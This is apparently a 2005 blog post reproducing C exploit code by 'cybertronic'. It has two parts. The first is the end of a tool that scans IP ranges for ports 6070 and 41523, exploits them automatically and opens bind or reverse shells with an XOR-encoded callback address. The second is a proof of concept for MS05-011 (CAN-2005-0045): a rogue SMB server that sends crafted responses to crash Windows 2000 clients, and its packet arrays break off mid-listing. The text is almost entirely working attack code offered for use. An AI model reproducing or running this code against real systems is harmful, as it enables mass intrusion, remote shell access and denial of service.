if ( connect ( s, ( struct sockaddr * ) &remote_addr, sizeof ( struct sockaddr ) ) == -1 )
{
printf ( RED "failed!\n\n" NORMAL);
exit ( 1 );
}
printf ( YELLOW "done!\n" NORMAL);
shell ( s, tip, bport );
}
void
fall_asleep ( int sec )
{
sleep ( sec );
}
void
header ()
{
printf ( YELLOW " __ __ _ \n" );
printf ( " _______ __/ /_ ___ _____/ /__________ ____ (_)____ \n" );
printf ( " / ___/ / / / __ \\/ _ \\/ ___/ __/ ___/ __ \\/ __ \\/ / ___/ \n" );
printf ( "/ /__/ /_/ / /_/ / __/ / / /_/ / / /_/ / / / / / /__ \n" );
printf ( "\\___/\\__, /_.___/\\___/_/ \\__/_/ \\____/_/ /_/_/\\___/ \n" );
printf ( " /____/ \n\n" NORMAL );
printf ( "--[ exploit by : cybertronic - cybertronic[at]gmx[dot]net\n" );
}
void
parse_arguments ( int argc, char* argv[], args* argp )
{
int i = 0;
while ( ( i = getopt ( argc, argv, "t:l:p:" ) ) != -1 )
{
switch ( i )
{
case 't':
argp->tip = optarg;
break;
case 'l':
argp->lip = optarg;
break;
case 'p':
argp->lport = atoi ( optarg );
break;
case ':':
case '?':
default:
usage ( argv[0] );
}
}
if ( argp->tip == NULL || argp->lip == NULL || argp->lport < 1 || argp->lport > 65535 )
usage ( argv[0] );
}
void
start_reverse_handler ( int cbport )
{
int s1, s2;
struct sockaddr_in cliaddr, servaddr;
socklen_t clilen = sizeof ( cliaddr );
bzero ( &servaddr, sizeof ( servaddr ) );
servaddr.sin_family = AF_INET;
servaddr.sin_addr.s_addr = htonl ( INADDR_ANY );
servaddr.sin_port = htons ( cbport );
printf ( "--[ starting reverse handler [port: %u]...", cbport );
if ( ( s1 = socket ( AF_INET, SOCK_STREAM, 0 ) ) == -1 )
{
printf ( "socket failed!\n" );
exit ( 1 );
}
bind ( s1, ( struct sockaddr * ) &servaddr, sizeof ( servaddr ) );
if ( listen ( s1, 1 ) == -1 )
{
printf ( "listen failed!\n" );
exit ( 1 );
}
printf ( YELLOW "done!\n" NORMAL);
if ( ( s2 = accept ( s1, ( struct sockaddr * ) &cliaddr, &clilen ) ) < 0 )
{
printf ( "accept failed!\n" );
exit ( 1 );
}
close ( s1 );
printf ( "--[ incomming connection from:\t" YELLOW " %s\n" NORMAL, inet_ntoa ( cliaddr.sin_addr ) );
shell ( s2, ( char* ) inet_ntoa ( cliaddr.sin_addr ), cbport );
close ( s2 );
}
void
start_scanner ( args* argp )
{
int i;
int s;
int fd;
int sc;
int option;
int ip1 = 0, a = 0;
int ip2 = 0, b = 0;
int ip3 = 0, c = 0;
int ip4 = 0, d = 0;
int status = 0;
char scan_ip[256];
char end_ip[256];
char line[256];
char system_time[64];
unsigned short port;
unsigned short xoredcbport;
unsigned long BRUTE_DELAY = 100000;
unsigned long MAX_CHILDS = 40;
unsigned long xoredcbip;
time_t ticks = time ( NULL );
bzero ( &scan_ip, sizeof ( scan_ip ) );
bzero ( &end_ip, sizeof ( end_ip ) );
bzero ( &system_time, sizeof ( system_time ) );
printf ( "\n" );
printf ( "--[ enter IP-range\n" );
printf ( " |\n" );
printf ( " |--" RED "[" NORMAL "start-ip" RED "]" NORMAL );
printf ( " $ " );
scanf ( "%s", scan_ip );
sscanf ( scan_ip, "%u.%u.%u.%u", &ip1, &ip2, &ip3, &ip4 );
if ( !isip ( scan_ip ) )
{
printf ( "Invalid IP!\n" );
exit ( 1 );
}
printf ( " `--" RED "[" NORMAL "end-ip " RED "]" NORMAL );
printf ( " $ " );
scanf ( "%s", end_ip );
sscanf ( end_ip, "%u.%u.%u.%u", &a, &b, &c, &d );
if ( !isip ( end_ip ) )
{
printf ( "Invalid IP!\n" );
exit ( 1 );
}
printf ( "\n" );
printf ( "--[ select port to scan for\n" );
printf ( " |\n" );
printf ( " |--" RED "[" NORMAL " 6070" RED "]" NORMAL " = dbasqlr\n" );
printf ( " `--" RED "[" NORMAL "41523" RED "]" NORMAL " = dsconfig\n" );
printf ( "\n" );
printf ( " $ " );
scanf ( "%u", &port );
if ( port != 6070 && port != 41523 )
{
printf ( "--[ I`m only scanning for port 6070 and 41523!\n" );
exit ( 1 );
}
printf ( "\n" );
printf ( "--[ I can try to exploit the bug, shall I ?\n" );
printf ( " |\n" );
printf ( " |--" RED "[" NORMAL "0" RED "]" NORMAL " yes, try it!\n" );
printf ( " `--" RED "[" NORMAL "1" RED "]" NORMAL " no, i`am on my own!\n" );
printf ( "\n" );
printf ( " $ " );
scanf ( "%u", &option );
if ( option != 0 && option != 1 )
{
printf ( "--[ invalid option!\n" );
exit ( 1 );
}
if ( option == 0 )
sc = select_shellcode ();
if ( ( fd = open ( "scan.log", O_CREAT | O_WRONLY | O_APPEND, S_IREAD | S_IWRITE ) ) == -1 )
{
printf ( "open failed!\n" );
exit ( 1 );
}
snprintf ( system_time, sizeof ( system_time ) -1, "\nDate: %s\n\n", ctime ( &ticks ) );
if ( write ( fd, system_time, strlen ( system_time ) -1 ) <= 0 )
{
printf ( RED "failed!\n" NORMAL);
exit ( 1 );
}
printf ( "\noO---[ scanner - scan.log ]---Oo\n\n" );
while ( 1 )
{
if ( ip3 > 254 ) { ip3 = 1; ip2++; }
if ( ip2 > 254 ) { ip2 = 1; ip1++; }
if ( ip1 > 254 )
exit ( 0 );
for ( ip4; ip4 < 255; ip4++ )
{
i++;
bzero ( &scan_ip, sizeof ( scan_ip ) );
snprintf ( scan_ip, sizeof ( scan_ip ) -1, "%u.%u.%u.%u", ip1, ip2, ip3, ip4 );
usleep ( BRUTE_DELAY );
switch ( fork () )
{
case 0:
{
switch ( is_open ( scan_ip, port ) )
{
case 0:
{
printf ( "[%s:%d] " GREEN "open" NORMAL "\n", scan_ip, port );
bzero ( &line, sizeof ( line ) );
snprintf ( line, sizeof ( line ) -1, "[%s:%d]\n\n", scan_ip, port );
if ( write ( fd, line, strlen ( line ) -1 ) <= 0 )
{
printf ( RED "failed!\n" NORMAL);
exit ( 1 );
}
if ( option == 0 )
{
printf ( "\n" );
printf ( "oO---[ exploitation ]---Oo\n" );
printf ( "\n" );
s = connect_to_remote_host ( scan_ip, port );
switch( sc )
{
case 0:
{
if ( port == 6070 )
{
if ( exploit_dbasqlr ( s, ( unsigned long ) NULL, ( unsigned short ) NULL, 1 ) == 1 )
{
printf ( "exploitation failed!\n" );
exit ( 1 );
}
connect_to_bindshell ( scan_ip, 4444 );
break;
}
else
{
if ( exploit_dsconfig ( s, ( unsigned long ) NULL, ( unsigned short ) NULL, 1 ) == 1 )
{
printf ( "exploitation failed!\n" );
exit ( 1 );
}
connect_to_bindshell ( scan_ip, 4444 );
break;
}
}
case 1:
{
if ( port == 6070 )
{
xoredcbip = inet_addr ( argp->lip ) ^ ( unsigned long ) 0x99999999;
xoredcbport = htons ( argp->lport ) ^ ( unsigned short ) 0x9999;
if ( exploit_dbasqlr ( s, xoredcbip, xoredcbport, 0 ) == 1 )
{
printf ( "exploitation failed!\n" );
exit ( 1 );
}
start_reverse_handler ( argp->lport );
break;
}
else
{
xoredcbip = inet_addr ( argp->lip ) ^ ( unsigned long ) 0x99999999;
xoredcbport = htons ( argp->lport ) ^ ( unsigned short ) 0x9999;
if ( exploit_dsconfig ( s, xoredcbip, xoredcbport, 0 ) == 1 )
{
printf ( "exploitation failed!\n" );
exit ( 1 );
}
start_reverse_handler ( argp->lport );
break;
}
}
}
}
break;
}
case 1:
printf ( "[%s:%d] " RED "closed" NORMAL "\n", scan_ip, port );
break;
default:
printf ( "[%s:%d] " RED "closed" NORMAL "\n", scan_ip, port );
break;
}
exit(0);
break;
}
case -1:
{
printf ( "fork failed!\n");
exit ( 1 );
break;
}
default:
{
if ( i > MAX_CHILDS - 2 )
{
wait ( &status );
i--;
}
break;
}
}
if ( ip1 == a && ip2 == b && ip3 == c && ip4 == d )
{
close ( fd );
printf ( "\noO---[ scan completed ]---Oo\n\n" );
exit ( 0 );
}
}
ip4 = 1;
ip3++;
}
}
void
usage ( char* name )
{
int i;
printf ( "\n" );
printf ( "Note: all switches have to be specified!\n" );
printf ( "You can choose between bind and cb shellcode later!\n" );
printf ( "\n" );
printf ( "Usage: %s -t -l -p \n", name );
printf ( "\n" );
exit ( 1 );
}
int
main ( int argc, char* argv[] )
{
int s, action, vuln, sc;
unsigned long xoredcbip;
unsigned short xoredcbport;
args myargs;
system ( "clear" );
header ();
parse_arguments ( argc, argv, &myargs );
if ( !isip ( myargs.tip ) )
{
printf ( "Invalid Target IP!\n" );
exit ( 1 );
}
if ( !isip ( myargs.lip ) )
{
printf ( "Invalid Connect Back IP!\n" );
exit ( 1 );
}
action = select_action ();
if ( !action )
start_scanner ( &myargs );
vuln = select_vulnerability ();
sc = select_shellcode ();
switch ( vuln )
{
case 0:
{
s = connect_to_remote_host ( myargs.tip, PORT_DBASQLR );
switch( sc )
{
case 0:
{
if ( exploit_dbasqlr ( s, ( unsigned long ) NULL, ( unsigned short ) NULL, 1 ) == 1 )
{
printf ( "exploitation failed!\n" );
exit ( 1 );
}
connect_to_bindshell ( myargs.tip, 4444 );
break;
}
case 1:
{
xoredcbip = inet_addr ( myargs.lip ) ^ ( unsigned long ) 0x99999999;
xoredcbport = htons ( myargs.lport ) ^ ( unsigned short ) 0x9999;
if ( exploit_dbasqlr ( s, xoredcbip, xoredcbport, 0 ) == 1 )
{
printf ( "exploitation failed!\n" );
exit ( 1 );
}
start_reverse_handler ( myargs.lport );
break;
}
}
break;
}
case 1:
{
s = connect_to_remote_host ( myargs.tip, PORT_DSCONFIG );
switch( sc )
{
case 0:
{
if ( exploit_dsconfig ( s, ( unsigned long ) NULL, ( unsigned short ) NULL, 1 ) == 1 )
{
printf ( "exploitation failed!\n" );
exit ( 1 );
}
connect_to_bindshell ( myargs.tip, 4444 );
break;
}
case 1:
{
xoredcbip = inet_addr ( myargs.lip ) ^ ( unsigned long ) 0x99999999;
xoredcbport = htons ( myargs.lport ) ^ ( unsigned short ) 0x9999;
if ( exploit_dsconfig ( s, xoredcbip, xoredcbport, 0 ) == 1 )
{
printf ( "exploitation failed!\n" );
exit ( 1 );
}
start_reverse_handler ( myargs.lport );
break;
}
}
break;
}
}
}
| | Thursday, June 23rd, 2005 | | 7:19 pm |
Windows SMB Client Transaction Response Handling PoC
/*
* Windows SMB Client Transaction Response Handling
*
* MS05-011
* CAN-2005-0045
*
* This works against Win2k
*
* cybertronic[at]gmx[dot]net
* http://www.livejournal.com/users/cybertronic/
*
* usage:
* gcc -o mssmb_poc mssmb_poc.c
* ./mssmb_poc
*
* connect via \\ip
* and hit the netbios folder!
*
* ***STOP: 0x00000050 (0xF115B000,0x00000001,0xFAF24690,
* 0x00000000)
* PAGE_FAULT_IN_NONPAGED_AREA
*
* The Client reboots immediately
*
* Technical Details (EEYE / http://www.eeye.com):
* ----------------------------------------------
*
* The driver MRXSMB.SYS is responsible for performing SMB
* client operations and processing the responses returned
* by an SMB server service. A number of important Windows
* File Sharing operations, and all RPC-over-named-pipes,
* use the SMB commands Trans (25h) and Trans2 (32h). A
* malicious SMB server can respond with specially crafted
* Transaction response data that will cause an overflow
* wherever the data is handled, either in MRXSMB.SYS or
* in client code to which it provides data. One example
* would be if the
*
* file name length field
*
* and the
*
* short file name length field
*
* in a Trans2 FIND_FIRST2 response packet can be supplied
* with inappropriately large values in order to cause an
* excessive memcpy to occur when the data is handled.
* In the case of these examples an attacker could leverage
* file:// links, that when clicked by a remote user, would
* lead to code execution.
*
* see:
* http://www.eeye.com/html/research/advisories/AD20050208.html
*
*/
#include
#include
#include
#include
#define PORT 445
unsigned char SmbNeg[] =
"\x00\x00\x00\x55"
"\xff\x53\x4d\x42" // SMB
"\x72" // SMB Command: Negotiate Protocol (0x72)
"\x00\x00\x00\x00" // NT Status: STATUS_SUCCESS (0x00000000)
"\x98" // Flags: 0x98
"\x53\xc8" // Flags2 : 0xc853
"\x00\x00" // Process ID High: 0
"\x00\x00\x00\x00\x00\x00\x00\x00" // Signature: 0000000000000000
"\x00\x00" // Reserved: 0000
"\x00\x00" // Tree ID: 0
"\xff\xfe" // Process ID: 65279
"\x00\x00" // User ID: 0
"\x00\x00" // Multiplex ID: 0
"\x11" // Word Count (WCT): 17
"\x05\x00" // Dialect Index: 5, greater than LANMAN2.1
"\x03" // Security Mode: 0x03
"\x0a\x00" // Max Mpx Count: 10
"\x01\x00" // Max VCs: 1
"\x04\x11\x00\x00" // Max Buffer Size: 4356
"\x00\x00\x01\x00" // Max Raw Buffer 65536
"\x00\x00\x00\x00" // Session Key: 0x00000000
"\xfd\xe3\x00\x80" // Capabilities: 0x8000e3fd
"\x52\xa2\x4e\x73\xcb\x75\xc5\x01" // System Time: Jun 20, 2005 12:08:32.327125000
"\x88\xff" // Server Time Zone: /120 min from UTC
"\x00" // Key Length: 0
"\x10\x00" // Byte Count (BCC): 16
"\x9e\x12\xd7\x77\xd4\x59\x6c\x40" // Server GUID: 9E12D777D4596C40
"\xbc\xc0\xb4\x22\x40\x50\x01\xd4";// BCC0B422405001D4
unsigned char SessionSetupAndXNeg[] = // Negotiate ERROR Response
"\x00\x00\x01\x1b"
"\xff\x53\x4d\x42\x73\x16\x00\x00\xc0\x98\x07\xc8\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00" // Tree ID: 0
"\x00\x00" // Process ID: 0
"\x00\x00" // USER ID
"\x00\x00" // Multiplex ID: 0
"\x04\xff\x00\x1b\x01\x00\x00\xa6\x00\xf0\x00\x4e\x54\x4c\x4d\x53"
"\x53\x50\x00\x02\x00\x00\x00\x12\x00\x12\x00\x30\x00\x00\x00\x15"
"\x82\x8a\xe0"
"\x00\x00\x00\x00\x00\x00\x00\x00" // NTLM Challenge
"\x00\x00\x00\x00\x00\x00\x00\x00\x64\x00\x64\x00\x42\x00\x00\x00"
"\x53\x00\x45\x00\x52\x00\x56\x00\x49\x00\x43\x00\x45\x00\x50\x00"
"\x43\x00\x02\x00\x12\x00\x53\x00\x45\x00\x52\x00\x56\x00\x49\x00"
"\x43\x00\x45\x00\x50\x00\x43\x00\x01\x00\x12\x00\x53\x00\x45\x00"
"\x52\x00\x56\x00\x49\x00\x43\x00\x45\x00\x50\x00\x43\x00\x04\x00"
"\x12\x00\x73\x00\x65\x00\x72\x00\x76\x00\x69\x00\x63\x00\x65\x00"
"\x70\x00\x63\x00\x03\x00\x12\x00\x73\x00\x65\x00\x72\x00\x76\x00"
"\x69\x00\x63\x00\x65\x00\x70\x00\x63\x00\x06\x00\x04\x00\x01\x00"
"\x00\x00\x00\x00\x00\x00\x00\x57\x00\x69\x00\x6e\x00\x64\x00\x6f"
"\x00\x77\x00\x73\x00\x20\x00\x35\x00\x2e\x00\x31\x00\x00\x00\x57"
"\x00\x69\x00\x6e\x00\x64\x00\x6f\x00\x77\x00\x73\x00\x20\x00\x32"
"\x00\x30\x00\x30\x00\x30\x00\x20\x00\x4c\x00\x41\x00\x4e\x00\x20"
"\x00\x4d\x00\x61\x00\x6e\x00\x61\x00\x67\x00\x65\x00\x72\x00\x00";
unsigned char SessionSetupAndXAuth[] =
"\x00\x00\x00\x75"
"\xff\x53\x4d\x42\x73\x00\x00\x00\x00\x98\x07\xc8\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00" // Tree ID: 0
"\x00\x00" // Process ID: 0
"\x00\x00" // USER ID
"\x00\x00" // Multiplex ID: 0
"\x04\xff\x00\x75\x00\x01\x00\x00\x00\x4a\x00\x4e\x57\x00\x69\x00"
"\x6e\x00\x64\x00\x6f\x00\x77\x00\x73\x00\x20\x00\x35\x00\x2e\x00"
"\x31\x00\x00\x00\x57\x00\x69\x00\x6e\x00\x64\x00\x6f\x00\x77\x00"
"\x73\x00\x20\x00\x32\x00\x30\x00\x30\x00\x30\x00\x20\x00\x4c\x00"
"\x41\x00\x4e\x00\x20\x00\x4d\x00\x61\x00\x6e\x00\x61\x00\x67\x00"
"\x65\x00\x72\x00\x00";
unsigned char TreeConnectAndX[] =
"\x00\x00\x00\x38"
"\xff\x53\x4d\x42\x75\x00\x00\x00\x00\x98\x07\xc8\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00" // Tree ID: 0
"\x00\x00" // Process ID: 0
"\x00\x00" // USER ID
"\x00\x00" // Multiplex ID: 0
"\x07\xff\x00\x38\x00\x01\x00\xff\x01\x00\x00\xff\x01\x00\x00\x07"
"\x00\x49\x50\x43\x00\x00\x00\x00";
unsigned char SmbNtCreate [] =
"\x00\x00\x00\x87"
"\xff\x53\x4d\x42" // SMB
"\xa2" // SMB Command: NT Create AndX (0xa2)
"\x00\x00\x00\x00" // NT Status: STATUS_SUCCESS (0x00000000)
"\x98" // Flags: 0x98
"\x07\xc8" // Flags2 : 0xc807
"\x00\x00" // Process ID High: 0
"\x00\x00\x00\x00\x00\x00\x00\x00" // Signature: 0000000000000000
"\x00\x00" // Reserved: 0000
"\x00\x00" // Tree ID: 0
"\x00\x00" // Process ID: 0
"\x00\x00" // User ID: 0
"\x00\x00" // Multiplex ID: 0
"\x2a" // Word Count (WCT): 42
"\xff" // AndXCommand: No further commands (0xff)
"\x00" // Reserved: 00
"\x87\x00" // AndXOffset: 135
"\x00" // Oplock level: No oplock granted (0)
"\x00\x00" // FID: 0
"\x01\x00\x00\x00" // Create action: The file existed and was opened (1)
"\x00\x00\x00\x00\x00\x00\x00\x00" // Created: No time specified (0)
"\x00\x00\x00\x00\x00\x00\x00\x00" // Last Access: No time specified (0)
"\x00\x00\x00\x00\x00\x00\x00\x00" // Last Write: No time specified (0)
"\x00\x00\x00\x00\x00\x00\x00\x00" // Change: No time specified (0)
"\x80\x00\x00\x00" // File Attributes: 0x00000080
"\x00\x10\x00\x00\x00\x00\x00\x00" // Allocation Size: 4096
"\x00\x00\x00\x00\x00\x00\x00\x00" // End Of File: 0
"\x02\x00" // File Type: Named pipe in message mode (2)
"\xff\x05" // IPC State: 0x05ff
"\x00" // Is Directory: This is NOT a directory (0)
"\x00\x00" // Byte Count (BCC): 0
// crap
"\x00\x00\x00\x0f\x00\x00\x00\x00"
"\x00\x74\x7a\x4f\xac\x2d\xdf\xd9"
"\x11\xb9\x20\x00\x10\xdc\x9b\x01"
"\x12\x00\x9b\x01\x12\x00\x1b\xc2";
unsigned char DceRpc[] =
"\x00\x00\x00\x7c"
"\xff\x53\x4d\x42\x25\x00\x00\x00\x00\x98\x07\xc8\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00" // Tree ID: 0
"\x00\x00" // Process ID: 0
"\x00\x00" // USER ID
"\x00\x00" // Multiplex ID: 0
"\x0a\x00\x00\x44\x00\x00\x00\x00\x00\x38\x00\x00\x00\x44\x00\x38"
"\x00\x00\x00\x00\x00\x45\x00\x00\x05\x00\x0c\x03\x10\x00\x00\x00"
"\x44\x00\x00\x00\x01\x00\x00\x00\xb8\x10\xb8\x10"
"\x00\x00\x00\x00" // Assoc Group
"\x0d\x00\x5c\x50\x49\x50\x45\x5c"
"\x00\x00\x00" // srv or wks
"\x73\x76\x63\x00\xff\x01\x00\x00\x00\x00\x00\x00\x00\x04\x5d\x88"
"\x8a\xeb\x1c\xc9\x11\x9f\xe8\x08\x00\x2b\x10\x48\x60\x02\x00\x00"
"\x00";
unsigned char WksSvc[] =
"\x00\x00\x00\xb0"
"\xff\x53\x4d\x42\x25\x00\x00\x00\x00\x98\x07\xc8\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00" // Tree ID: 0
"\x00\x00" // Process ID: 0
"\x00\x00" // USER ID
"\x00\x00" // Multiplex ID: 0
"\x0a\x00\x00\x78\x00\x00\x00\x00\x00\x38\x00\x00\x00\x78\x00\x38"
"\x00\x00\x00\x00\x00\x79\x00\x00\x05\x00\x02\x03\x10\x00\x00\x00"
"\x78\x00\x00\x00\x01\x00\x00\x00\x60\x00\x00\x00\x00\x00\x00\x00"
"\x64\x00\x00\x00\xb8\x0f\x16\x00\xf4\x01\x00\x00\xe6\x0f\x16\x00"
"\xd2\x0f\x16\x00\x05\x00\x00\x00\x01\x00\x00\x00\x0a\x00\x00\x00"
"\x00\x00\x00\x00\x0a\x00\x00\x00\x53\x00\x45\x00\x52\x00\x56\x00"
"\x49\x00\x43\x00\x45\x00\x50\x00\x43\x00\x00\x00\x0a\x00\x00\x00"
"\x00\x00\x00\x00\x0a\x00\x00\x00\x57\x00\x4f\x00\x52\x00\x4b\x00"
"\x47\x00\x52\x00\x4f\x00\x55\x00\x50\x00\x00\x00\x00\x00\x00\x00";
unsigned char SrvSvc[] =
"\x00\x00\x00\xac"
"\xff\x53\x4d\x42\x25\x00\x00\x00\x00\x98\x07\xc8\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00" // Tree ID: 0
"\x00\x00" // Process ID: 0
"\x00\x00" // USER ID
"\x00\x00" // Multiplex ID: 0
"\x0a\x00\x00\x74\x00\x00\x00\x00\x00\x38\x00\x00\x00\x74\x00\x38"
"\x00\x00\x00\x00\x00\x75\x00\x00\x05\x00\x02\x03\x10\x00\x00\x00"
"\x74\x00\x00\x00\x01\x00\x00\x00\x5c\x00\x00\x00\x00\x00\x00\x00"
"\x65\x00\x00\x00\x68\x3d\x14\x00\xf4\x01\x00\x00"
"\x80\x3d\x14\x00" // Server IP
"\x05\x00\x00\x00\x01\x00\x00\x00\x03\x10\x05\x00\x9c\x3d\x14\x00"
"\x0e\x00\x00\x00\x00\x00\x00\x00\x0e\x00\x00\x00"
"\x31\x00\x39\x00\x32\x00\x2e\x00\x31\x00\x36\x00\x38\x00\x2e\x00" // Server IP ( UNICODE )
"\x32\x00\x2e\x00\x31\x00\x30\x00\x33\x00\x00\x00"
"\x01\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x55\x00"
"\x00\x00\x00\x00";
unsigned char SmbClose[] =
"\x00\x00\x00\x23"
"\xff\x53\x4d\x42" // SMB
"\x04" // SMB Command: Close (0x04)
"\x00\x00\x00\x00" // NT Status: STATUS_SUCCESS (0x00000000)
"\x98" // Flags: 0x98
"\x07\xc8" // Flags2 : 0xc807
"\x00\x00" // Process ID High: 0
"\x00\x00\x00\x00\x00\x00\x00\x00" // Signature: 0000000000000000
"\x00\x00" // Reserved: 0000
"\x00\x00" // Tree ID: 0
"\x00\x00" // Process ID: 0
"\x00\x00" // USER ID
"\x00\x00" // Multiplex ID: 0
"\x00" // Word Count (WCT): 0
"\x00\x00"; // Byte Count (BCC): 0
unsigned char NetrShareEnum[] =
"\x00\x00\x01\x90"
"\xff\x53\x4d\x42\x25\x00\x00\x00\x00\x98\x07\xc8\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00" // Tree ID: 0
"\x00\x00" // Process ID: 0
"\x00\x00" // USER ID
"\x00\x00" // Multiplex ID: 0
"\x0a\x00\x00\x58\x01\x00\x00\x00\x00\x38\x00\x00\x00\x58\x01\x38"
"\x00\x00\x00\x00\x00\x59\x01\x00\x05\x00\x02\x03\x10\x00\x00\x00"
"\x58\x01\x00\x00\x01\x00\x00\x00\x40\x01\x00\x00\x00\x00\x00\x00"
"\x01\x00\x00\x00\x01\x00\x00\x00\x54\x0a\x17\x00\x04\x00\x00\x00"
"\xa0\x28\x16\x00\x04\x00\x00\x00\x80\x48\x16\x00\x03\x00\x00\x80"
"\x8a\x48\x16\x00\x6e\x48\x16\x00\x00\x00\x00\x00\x7e\x48\x16\x00"
"\x48\x48\x16\x00\x00\x00\x00\x80\x56\x48\x16\x00\x20\x48\x16\x00"
"\x00\x00\x00\x80\x26\x48\x16\x00\x05\x00\x00\x00\x00\x00\x00\x00"
"\x05\x00\x00\x00\x49\x00\x50\x00\x43\x00\x24\x00\x00\x00\x36\x00"
"\x0b\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x52\x00\x65\x00"
"\x6d\x00\x6f\x00\x74\x00\x65\x00\x2d\x00\x49\x00\x50\x00\x43\x00"
"\x00\x00\x37\x00\x08\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00"
"\x6e\x00\x65\x00\x74\x00\x62\x00\x69\x00\x6f\x00\x73\x00\x00\x00"
"\x01\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00"
"\x07\x00\x00\x00\x00\x00\x00\x00\x07\x00\x00\x00\x41\x00\x44\x00"
"\x4d\x00\x49\x00\x4e\x00\x24\x00\x00\x00\x00\x00\x0c\x00\x00\x00"
"\x00\x00\x00\x00\x0c\x00\x00\x00\x52\x00\x65\x00\x6d\x00\x6f\x00"
"\x74\x00\x65\x00\x61\x00\x64\x00\x6d\x00\x69\x00\x6e\x00\x00\x00"
"\x03\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x43\x00\x24\x00"
"\x00\x00\x39\x00\x11\x00\x00\x00\x00\x00\x00\x00\x11\x00\x00\x00"
"\x53\x00\x74\x00\x61\x00\x6e\x00\x64\x00\x61\x00\x72\x00\x64\x00"
"\x66\x00\x72\x00\x65\x00\x69\x00\x67\x00\x61\x00\x62\x00\x65\x00"
"\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";
unsigned char OpenPrinterEx[] =
"\x00\x00\x00\x68"
"\xff\x53\x4d\x42\x25\x00\x00\x00\x00\x98\x07\xc8\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00" // Tree ID: 0
"\x00\x00" // Process ID: 0
"\x00\x00" // USER ID
"\x00\x00" // Multiplex ID: 0
"\x0a\x00\x00\x30\x00\x00\x00\x00\x00\x38\x00\x00\x00\x30\x00\x38"
"\x00\x00\x00\x00\x00\x31\x00\x00\x05\x00\x02\x03\x10\x00\x00\x00"
"\x30\x00\x00\x00\x01\x00\x00\x00\x18\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x24\xd7\x9c\xf8\xbb\xe1\xd9\x11\xb9\x29\x00\x10"
"\xdc\x4a\x6b\xbb\x00\x00\x00\x00";
unsigned char ClosePrinter[] =
"\x00\x00\x00\x68"
"\xff\x53\x4d\x42\x25\x00\x00\x00\x00\x98\x07\xc8\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00" // Tree ID: 0
"\x00\x00" // Process ID: 0
"\x00\x00" // USER ID
"\x00\x00" // Multiplex ID: 0
"\x0a\x00\x00\x30\x00\x00\x00\x00\x00\x38\x00\x00\x00\x30\x00\x38"
"\x00\x00\x00\x00\x00\x31\x00\x00\x05\x00\x02\x03\x10\x00\x00\x00"
"\x30\x00\x00\x00\x02\x00\x00\x00\x18\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00";
unsigned char OpenHklm[] =
"\x00\x00\x00\x68"
"\xff\x53\x4d\x42\x25\x00\x00\x00\x00\x98\x07\xc8\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00" // Tree ID: 0
"\x00\x00" // Process ID: 0
"\x00\x00" // USER ID
"\x00\x00" // Multiplex ID: 0
"\x0a\x00\x00\x30\x00\x00\x00\x00\x00\x38\x00\x00\x00\x30\x00\x38"
"\x00\x00\x00\x00\x00\x31\x00\x00\x05\x00\x02\x03\x10\x00\x00\x00"
"\x30\x00\x00\x00\x01\x00\x00\x00\x18\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x4e\x4c\xb2\xf8\xbb\xe1\xd9\x11\xb9\x29\x00\x10"
"\xdc\x4a\x6b\xbb\x00\x00\x00\x00";
unsigned char OpenKey[] =
"\x00\x00\x00\x68"
"\xff\x53\x4d\x42\x25\x00\x00\x00\x00\x98\x07\xc8\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00" // Tree ID: 0
"\x00\x00" // Process ID: 0
"\x00\x00" // USER ID
"\x00\x00" // Multiplex ID: 0
"\x0a\x00\x00\x30\x00\x00\x00\x00\x00\x38\x00\x00\x00\x30\x00\x38"
"\x00\x00\x00\x00\x00\x31\x00\x00\x05\x00\x02\x03\x10\x00\x00\x00"
"\x30\x00\x00\x00\x02\x00\x00\x00\x18\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x05\x00\x00\x00";
unsigned char CloseKey[] =
"\x00\x00\x00\x68"
"\xff\x53\x4d\x42\x25\x00\x00\x00\x00\x98\x07\xc8\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00" // Tree ID: 0
"\x00\x00" // Process ID: 0
"\x00\x00" // USER ID
"\x00\x00" // Multiplex ID: 0
"\x0a\x00\x00\x30\x00\x00\x00\x00\x00\x38\x00\x00\x00\x30\x00\x38"
"\x00\x00\x00\x00\x00\x31\x00\x00\x05\x00\x02\x03\x10\x00\x00\x00"
"\x30\x00\x00\x00\x03\x00\x00\x00\x18\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00";
unsigned char NetBios1[] =
"\x00\x00\x00\x94"
"\xff\x53\x4d\x42\x25\x00\x00\x00\x00\x98\x07\xc8\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00" // Tree ID: 0
"\x00\x00" // Process ID: 0
